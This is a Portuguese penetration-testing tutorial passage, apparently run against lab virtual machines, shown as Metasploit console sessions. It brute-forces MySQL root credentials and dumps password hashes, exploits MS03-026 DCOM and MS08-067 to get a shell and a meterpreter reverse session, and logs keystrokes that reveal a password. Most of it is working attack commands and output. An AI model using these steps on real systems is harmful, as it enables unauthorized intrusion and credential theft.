Ganho de Acesso

Após o reconhecimento e scanning e de posse das informações necessárias,
partiremos para o ganho de acesso ao sistema.

Explorando vulnerabilidade de senha servidor MySQL através da técnica de força

bruta.

root@bt:/# msfconsole

 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r15549 updated 169 days ago (2012.02.23)

Warning: This copy of the Metasploit Framework was last updated 169 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://community.rapid7.com/docs/DOC-1306







msf > use auxiliary/scanner/mysql/mysql_login
msf  auxiliary(mysql_login) > set BRUTEFORCE_SPEED 5
BRUTEFORCE_SPEED => 5
msf  auxiliary(mysql_login) > set RHOSTS 192.168.1.108
RHOSTS => 192.168.1.108
msf  auxiliary(mysql_login) > set THREADS 30
THREADS => 30
msf  auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_login) > run

[*] 192.168.1.108:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 192.168.1.108:3306 MYSQL - [1/2] - Trying username:'root' with password:''
[*] 192.168.1.108:3306 MYSQL - [1/2] - failed to login as 'root' with password ''
[*] 192.168.1.108:3306 MYSQL - [2/2] - Trying username:'root' with password:'root'
[+] 192.168.1.108:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

No exemplo anterior, utilizamos o módulo auxiliar

auxiliary/scanner/mysql/mysql_login, setamos o método força bruta, host alvo
192.168.1.108, ações concorrentes no valor de 30 e por final “chutamos” uma senha
padrão comumente utilizada no usuário MySQl , neste caso root, após executamos com

o comando run. o RESULTADO : SUCCESSFUL LOGIN ‘root’ : ‘root’

Após o sucesso em nossa investida, podemos progredir no terreno:

msf > use auxiliary/admin/mysql/mysql_enum
msf  auxiliary(mysql_enum) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf  auxiliary(mysql_enum) > set PASSWORD root
PASSWORD => root
msf  auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_enum) > run


[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.0.51a-3ubuntu5
[*]     Compiled for the following OS: debian-linux-gnu
[*]     Architecture: i486
[*]     Server Hostname: metasploitable
[*]     Data Directory: /var/lib/mysql/
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: YES
[*]     Allow Table Merge: YES
[*]     SSL Connections: Enabled
[*]     SSL CA Certificate: /etc/mysql/cacert.pem
[*]     SSL Key: /etc/mysql/server-key.pem
[*]     SSL Certificate: /etc/mysql/server-cert.pem
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]             User: root Host: localhost Password Hash: 

*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*]             User: root Host: ubuntu804-base Password Hash: 

*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*]             User: root Host: 127.0.0.1 Password Hash: 

*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*]             User:  Host: localhost Password Hash:
[*]             User:  Host: ubuntu804-base Password Hash:
[*]             User: debian-sys-maint Host: localhost Password Hash: 

*E07F0A7CCC0044345116513C989F45663C1F8347
[*]             User: root Host: % Password Hash: 

*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*]     The following users have GRANT Privilege:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: debian-sys-maint Host: localhost
[*]             User: root Host: %
[*]     The following users have CREATE USER Privilege:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: debian-sys-maint Host: localhost
[*]             User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: debian-sys-maint Host: localhost
[*]             User: root Host: %
[*]     The following users have SUPER Privilege:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: debian-sys-maint Host: localhost
[*]             User: root Host: %
[*]     The following users have FILE Privilege:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: debian-sys-maint Host: localhost
[*]             User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: debian-sys-maint Host: localhost
[*]             User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]             User: root Host: localhost
[*]             User: root Host: ubuntu804-base
[*]             User: root Host: 127.0.0.1
[*]             User: debian-sys-maint Host: localhost
[*]             User: root Host: %
[*]     Anonymous Accounts are Present:
[*]             User:  Host: localhost
[*]             User:  Host: ubuntu804-base
[*]     The following accounts have empty passwords:
[*]             User:  Host: localhost
[*]             User:  Host: ubuntu804-base
[*]     The following accounts are not restricted by source:
[*]             User: root Host: %
[*] Auxiliary module execution completed

Agora com o módulo mysql_sql, podemos verificar os esquemas das bases de dados:

msf > use auxiliary/admin/mysql/mysql_sql
msf  auxiliary(mysql_sql) > set USER root
USER => root
msf  auxiliary(mysql_sql) > set PASSWORD root
PASSWORD => root
msf  auxiliary(mysql_sql) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf  auxiliary(mysql_sql) > set SQL show databases
SQL => show databases
msf  auxiliary(mysql_sql) > set PORT 3306
PORT => 3306
msf  auxiliary(mysql_sql) > run


[*] Sending statement: 'show databases'...
[*]  | information_schema |
[*]  | mysql |
[*]  | tikiwiki |
[*]  | tikiwiki195 |
[*] Auxiliary module execution completed

Nosso próximo passo será o ataque de sistemas vulneraveis RPC.

msf > nmap -sS 192.168.1.101
[*] exec: nmap -sS 192.168.1.101


Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-08-10 12:39 BRT
Nmap scan report for 192.168.1.101
Host is up (0.00039s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
MAC Address: 00:0C:29:7D:B7:84 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Repare acima, nosso alvo possui a porta 135 na escuta, vamos pesquisar exploits
para execução do ataque de vulnerabilidade RPC dcom

msf > search dcom

Matching Modules
================

   Name                                       Disclosure Date  Rank   Description
   ----                                       ---------------  ----   -----------
   exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great  Microsoft 

RPC DCOM Interface Overflow
   exploit/windows/driver/broadcom_wifi_ssid  2006-11-11       low    Broadcom 

Wireless Driver Probe Response SSID Overflow
   exploit/windows/smb/ms04_031_netdde        2004-10-12       good   Microsoft 

NetDDE Service Overflow

Vamos utilizar exploit/windows/dcerpc/ms03_026_dcom

msf > use  exploit/windows/dcerpc/ms03_026_dcom
msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf  exploit(ms03_026_dcom) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf  exploit(ms03_026_dcom) > set RPORT 135
RPORT => 135
msf  exploit(ms03_026_dcom) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf  exploit(ms03_026_dcom) > exploit

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-

0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.101[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.101

[135] ...
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.1.109:38144 -> 192.168.1.101:4444) at 

2012-08-10 12:46:18 -0300

Microsoft Windows [versÆo 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Bem, podemos verificar acima que mais uma vez obtivemos sucesso em nossa

investida. A seguir utilizaremos o meterpreter para comprometimento do alvo
e captura de teclas.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.107
RHOST => 192.168.1.107
msf  exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.109:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.107
[*] Meterpreter session 2 opened (192.168.1.109:4444 -> 192.168.1.107:1047) at 2012-08-10 12:57:24 -0300

Nosso alvo foi comprometido, então agora podemos excutar os comandos para captura de teclas Keylogging, o primeiro passo e analisar os processos, após migrar o
processo escolhido e depois capturar os dados:

meterpreter > ps

Process list
============

PID   Name               Arch  Session  User                          Path
 ---   ----               ----  -------  ----                          ----
 0     [System Process]
 4     System             x86   0        NT AUTHORITY\SYSTEM
 416   wscntfy.exe        x86   0        WHITEHAT-E8A438\cobaia          C:\WINDOWS\system32\wscntfy.exe
 496   smss.exe           x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 528   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 568   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 604   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 628   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 672   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 684   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 840   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 856   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 936   svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1032  svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1092  svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1148  svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1256  logon.scr          x86   0        WHITEHAT-E8A438\cobaia          C:\WINDOWS\System32\logon.scr
 1356  TPAutoConnSvc.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 1524  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1544  explorer.exe       x86   0        WHITEHAT-E8A438\cobaia          C:\WINDOWS\Explorer.EXE
 1640  alg.exe            x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 1676  VMwareTray.exe     x86   0        WHITEHAT-E8A438\cobaia          C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1684  vmtoolsd.exe       x86   0        WHITEHAT-E8A438\cobaia          C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1760  ctfmon.exe         x86   0        WHITEHAT-E8A438\cobaia          C:\WINDOWS\system32\ctfmon.exe
 1840  cmd.exe            x86   0        WHITEHAT-E8A438\cobaia          C:\WINDOWS\system32\cmd.exe
 1892  TPAutoConnect.exe  x86   0        WHITEHAT-E8A438\cobaia          C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 2008  wuauclt.exe        x86   0        WHITEHAT-E8A438\cobaia          C:\WINDOWS\system32\wuauclt.exe


meterpreter > migrate 1544
[*] Migrating to 1544...
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
www.backtrack.com    [email protected] senha123 

É isso ai !!! agora basta que o pentest utilize a criatividade .